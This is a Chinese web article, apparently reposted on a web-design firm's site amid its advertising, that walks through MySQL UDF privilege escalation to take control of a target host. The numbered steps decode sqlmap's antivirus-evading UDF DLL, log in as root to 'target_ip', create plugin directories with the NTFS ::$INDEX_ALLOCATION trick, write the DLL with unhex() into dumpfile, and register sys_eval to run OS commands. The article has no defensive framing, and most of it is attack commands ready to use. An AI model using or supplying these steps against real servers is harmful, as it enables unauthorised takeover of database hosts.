本文主要給大家介紹MySQL中UDF提權獲取主機控制權的詳細步驟,文章內容都是筆者用心摘選和編輯的,具有一定的針對性,對大家的參考意義還是比較大的,下面跟筆者一起了解下MySQL中UDF提權獲取主機控制權的詳細步驟吧。
成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網綜合服務,包含不限于網站建設、網站制作、伊金霍洛網絡推廣、微信小程序開發(fā)、伊金霍洛網絡營銷、伊金霍洛企業(yè)策劃、伊金霍洛品牌公關、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等,從售前售中售后,我們都將竭誠為您服務,您的肯定,是我們最大的嘉獎;成都創(chuàng)新互聯(lián)公司為所有大學生創(chuàng)業(yè)者提供伊金霍洛建站搭建服務,24小時服務熱線:028-86922220,官方網址:jinyejixie.com
1、python clock.py -d -i lib_mysqludfsys.dll
此步是獲取***用的UDF dll。首先要安裝sqlmap,然后運行上述命令即可得到解碼之后的UDF dll。(sqlmap對其進行編碼是為了免殺)
2、mysql -h target_ip -uroot -p
與目標MySQL建立連接
3、select version();
查看MySQL版本
4、select @@basedir;
查看MySQL的安裝目錄。假設為 c:\program files\mysql\mysql server 5.1
5、select @@plugin_dir;
查看MySQL的插件目錄。假設為c:\program files\mysql\mysql server 5.1\plugin
6、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\lib::$INDEX_ALLOCATION';
創(chuàng)建lib目錄
7、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\plugin::$INDEX_ALLOCATION';
創(chuàng)建plugin目錄
8、select unhex('hex_of_udf.dll') into dumpfile "c:\program files\mysql\mysql server 5.1\plugin\udf.dll";
創(chuàng)建udf.dll,上述命令中hex_of_udf.dll是udf.dll的十六進制文本,可用winhex等編輯軟件獲得
9、create function sys_eval returns string soname 'udf.dll';
創(chuàng)建函數(shù)
10、select sys_eval('whoami');
執(zhí)行shell命令,表明以獲取操作系統(tǒng)的控制權
看完以上關于MySQL中UDF提權獲取主機控制權的詳細步驟,很多讀者朋友肯定多少有一定的了解,如需獲取更多的行業(yè)知識信息 ,可以持續(xù)關注我們的行業(yè)資訊欄目的。
文章名稱:MySQL中UDF提權獲取主機控制權的詳細步驟
文章起源:http://jinyejixie.com/article36/gdpcsg.html
成都網站建設公司_創(chuàng)新互聯(lián),為您提供自適應網站、App開發(fā)、搜索引擎優(yōu)化、ChatGPT、網站收錄、響應式網站
聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)